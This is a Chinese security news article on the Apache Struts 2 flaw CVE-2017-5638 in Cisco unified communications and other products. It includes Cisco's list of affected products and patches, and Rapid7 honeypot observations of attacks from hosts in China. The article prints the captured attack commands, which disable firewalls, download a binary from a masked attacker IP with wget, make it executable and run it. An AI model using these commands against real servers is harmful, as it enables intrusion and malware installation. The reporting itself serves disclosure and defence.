思科多款统一通信设备存在Struts 2漏洞 美安全公司Rapid7称捕获了两次来自中国的攻击

周五,思科对客户发出通知称,至少一部分思科产品中存在 Apache Struts2命令执行漏洞 。在过去几天内,该漏洞被攻击者大肆利用。

思科公开了存在Struts 2漏洞的产品列表

经证实,该漏洞已影响到思科身份服务引擎(ISE)、主要服务目录虚拟设备以及统一SIP代理软件。思科已公布了几十个未受影响的产品清单,但很多产品仍在调查中。

Network and Content Security Devices

Cisco Identity Services Engine (ISE)   CSCvd49829

补丁有效:1.2, 1.3, 1.4, and 2.x hot patches (18-March-2017)

Network Management and Provisioning

Cisco Prime Service Catalog Appliance and Virtual Appliance  CSCvd49816

补丁有效:

psc-patch-12.0.0-1 (13-March-2017) 
pscva-patch-12.0.0-1 (14-March-2017)

Voice and Unified Communications Devices

  • Cisco Emergency ResponderCSCvd51442
  • Cisco Unified Communications Manager IM & Presence Service (formerly CUPS)CSCvd49842
  • Cisco Unified Communications Manager Session Management EditionCSCvd49840
  • Cisco Unified Communications ManagerCSCvd49840
  • Cisco Unified Contact Center EnterpriseCSCvd51210
  • Cisco Unified Intelligent Contact Management EnterpriseCSCvd51210
  • Cisco Unified SIP Proxy SoftwareCSCvd49788
  • Cisco Unity Connection

思科称尚未发现针对其产品攻击的证据

虽然漏洞被积极利用来传播恶意软件,思科尚未发现任何针对其产品攻击的证据。尽管如此,该公司已警示用户,该漏洞的利用程序是公开的。

Struts 2.3.5至2.3.31和Struts 2.5至2.5.10受到了该安全漏洞(CVE-2017-5638)的影响。3月6日,思科发布了Struts 2.3.32和2.5.10.1。第一轮攻击是在概念证明(PoC)利用程序发布后的一天内被发现的。

该漏洞存在于Jakarta Multipart parser分析器内,是因为对Content-Type头值处理不当造成的。未经身份验证的远程攻击者可利用该漏洞通过发送特制的HTTP请求执行任意命令。

研究人员观察到,漏洞利用程序的目标是确定脆弱系统和攻击者试图提交各种类型的恶意软件(包括IRC保镖和DoS/DDoS僵尸)的系统。

思科和其他安全厂商已开始发布防火墙规则来阻止这种攻击。绿盟科技提供了Struts2漏洞 免费在线扫描工具 ,Tinfoil Security公司也提供了 一款在线工具 ,允许网站所有者检查其网站是否受到CVE-2017-5638漏洞的影响。

Rapid7 给出分析称两次恶意请求来自中国

Rapid7一直在监测攻击,并根据蜜罐数据确认了大部分恶意流量来自位于中国的两台机器。

第一次匹配到的恶意请求是在 UTC时间3月7日周二下午15:36 ,恶意请求来自中国郑州的一台主机。 Both were HTTP GET requests for /index.aciton (misspelled) and the commands that they executed would have caused a vulnerable target to download binaries from the attacking server. Here is an example of the commands that were sent as a single string in the Content-Type value:

  1. cd /dev/shm;
  2. wget http://XXX.XXX.XXX.92:92/lmydess;
  3. chmod 777 lmydess;
  4. ./lmydess;
研究员抽取了一部分代码,以便阅读。这是相当标准的注入命令或 针对web 服务器的远程代码执行攻击。基本上,是让一些地方可写,下载代码,确保其可执行文件,并运行它。

之后恶意请求流量似乎停了,直到UTC时间3月8日周四上午09:02,我们捕获了一次来自中国上海主机的攻击。 The requests differed from the previous attacks. The new attacks were HTTP POSTs to a couple different paths and attempted to execute different commands on the victim:

  1. /etc/init.d/iptables stop;
  2. service iptables stop;
  3. SuSEfirewall2 stop;
  4. reSuSEfirewall2 stop;
  5. cd /tmp;
  6. wget -c http://XXX.XXX.XXX.26:9/7;
  7. chmod 777 7;
  8. ./7;

Rapid7是做什么的

Rapid7是一家互联网安全公司。2015 年 7 月,首次公开发行股票。年收入据称超过1亿美金。在 2016 年,他们推出新的产品InsightIDR。

独立研究员Matthew Kienow和来自Rapid7的Tod Beardsly、Deral Heiland分析了9个厂商的网络管理系统,包括Spiceworks、Ipswitch、Castle Rock、ManageEngine、CloudView、Paessler、Opmantek、Netikus和Opsview。

原文发布时间:2017年3月24日

本文由:securityWeek 发布,版权归属于原作者

原文链接:http://toutiao.secjia.com/cisco-unified-communications-devices-struts-2-vulnerability#

本文来自合作伙伴安全加,了解相关信息可以关注安全加网站 

时间: 2024-09-20 16:29:39

思科多款统一通信设备存在Struts 2漏洞 美安全公司Rapid7称捕获了两次来自中国的攻击的相关文章

《思科UCS服务器统一计算》一1.2 数据中心的演变

1.2 数据中心的演变 思科UCS服务器统一计算本节介绍数据中心服务器架构的演变. 1.2.1 独立服务器 也称为离散服务器,它们是具有专有外观尺寸的独立服务器,可能包含从桌面PC到大型主机的任何计算机.它们都有如图1-3所示的基本组件,但处理器.内存.I/O容量.扩展槽和集成存储的数量可能不同. 最大型的独立服务器可以运行多个不同应用程序,且支持大量用户.通常,它们使用某种形式的虚拟化软件来同时运行多个操作系统.但是,无论一台服务器的性能多强大,在物理限制和用于运行特定应用程序的操作系统方面都

《思科UCS服务器统一计算》一2.2 内存子系统

2.2 内存子系统 思科UCS服务器统一计算 电子业在制造内存子系统上花费了巨大的精力,使内存子系统能够满足现代处理器所需的低访问时间和当今应用程序的高容量需求. 在介绍当前的内存子系统之前,有必要先介绍一些最常用的术语. RAM(随机访问内存,Random Access Memory) SRAM(静态RAM,Static RAM) DRAM(动态RAM,Dynamic RAM) SDRAM(同步DRAM,Synchronous DRAM) SIMM(单列直插式内存模块,Single Inlin

《思科UCS服务器统一计算》一1.1 数据中心挑战

1.1 数据中心挑战 思科UCS服务器统一计算 数据中心是大公司IT基础架构的中心.典型的财富500强公司在世界各地运行数千个应用程序,存储PB级数据,并且有多个数据中心和一个适当的灾难恢复计划.但是,这种大规模的基础架构通常成本高昂! 数据中心需要昂贵的不动产,它们消耗大量电力,并且通常运营费用也很庞大. 为了更好地了解数据中心可以有多大规模,参考书目[35]列举了一些示例: Google Dalles(OR)数据中心占地68680平方英尺(6380m2): Microsoft Quincy,

《思科UCS服务器统一计算》一2.4 Intel微架构

2.4 Intel微架构 思科UCS服务器统一计算 思科UCS使用Nehalem和Westmere微架构(更通用点说,是32nm和45nm的Hi-k Intel Core微架构)的Intel处理器. Nehalem微架构于2009年初引入到了服务器中,也是Intel[32].[32].[34]开发的第一个使用45nm硅技术的架构.Nehalem处理器可广泛应用于高端桌面应用程序.超大规模服务器平台等.代号名来源于位于太平洋西北岸的美国俄勒冈州的Nehalem河. 根据Intel公司的说法,处理器

《思科UCS服务器统一计算》一2.1 处理器的演变

2.1 处理器的演变 思科UCS服务器统一计算 现代处理器或中央处理器(Central Processing Unit,CPU)都采用了最新的硅技术,一个晶片(包含一个处理器的半导体材料块)上有数百万个晶体管和数兆内存. 多个晶片焊接到一起就形成了一个硅片(硅晶圆),每个晶片都是独立切块.测试和用陶瓷封装的.这个过程包括安装晶片.将晶片衬垫连接到陶瓷封装的插脚上,然后密封晶片.至此,封装好的处理器就可以上市并在服务器上安装它们了.图2-1显示了封装好的Intel Xeon 5500处理器. 2.

《思科UCS服务器统一计算》一第2章 服务器架构

第2章 服务器架构 思科UCS服务器统一计算 从性能角度来看,处理器.内存和I/O是服务器中最重要的三个子系统.在某个给定的时间点,其中一个常常会成为瓶颈.我们经常会听说应用程序受CPU限制.受内存限制或受I/O限制. 在本章中,我们将详细介绍这三个子系统,具体参照根据IA-32(Intel架构,32位)构建的服务器,IA-32通常称为x86架构.具体地讲,我们将介绍与IA-32架构兼容的最新一代Intel处理器,也就是Intel微架构(以前的代号为Nehalem)1. Nehalem微架构(参

《思科UCS服务器统一计算》一2.3 I/O子系统

2.3 I/O子系统 思科UCS服务器统一计算I/O子系统负责在服务器内存和外部世界之间传输数据.传统上,这种传输是通过服务器主板上兼容PCI(外围组件互联,PCI)标准的I/O总线实现的.开发PCI的目的是让计算机系统的外围设备可实现互联.PCI的历史非常悠久[1],现在的最新版本是PCI-Express. 外围部件互联专业组(Peripheral Component Interconnect Special Interest Group,PCI-SIG)负责开发和增强PCI标准. PCI E

《思科UCS服务器统一计算》一第2章 服务器架构2.1 处理器的演变

第2章 服务器架构 思科UCS服务器统一计算从性能角度来看,处理器.内存和I/O是服务器中最重要的三个子系统.在某个给定的时间点,其中一个常常会成为瓶颈.我们经常会听说应用程序受CPU限制.受内存限制或受I/O限制. 在本章中,我们将详细介绍这三个子系统,具体参照根据IA-32(Intel架构,32位)构建的服务器,IA-32通常称为x86架构.具体地讲,我们将介绍与IA-32架构兼容的最新一代Intel处理器,也就是Intel微架构(以前的代号为Nehalem)1. Nehalem微架构(参见

《思科UCS服务器统一计算》一导读

前言 思科UCS服务器统一计算本书是作者的工作成果,作者最初在Nuova 公司工作,随后在思科公司中从事"加利福尼亚"项目,该项目的正式名称为思科统一计算系统(Unified Computing Systems,UCS). UCS是一种创新技术平台,将多项传统数据中心技术技能集合并到了一个系统中.因此,具有不同背景(甚至来自不同国家)的作者,决定组合他们的知识来共同出版本书. 本书从教育角度介绍UCS:我们试图提供有关下列内容的最新信息:所有服务器组件和新数据中心技术,以及如何使用这些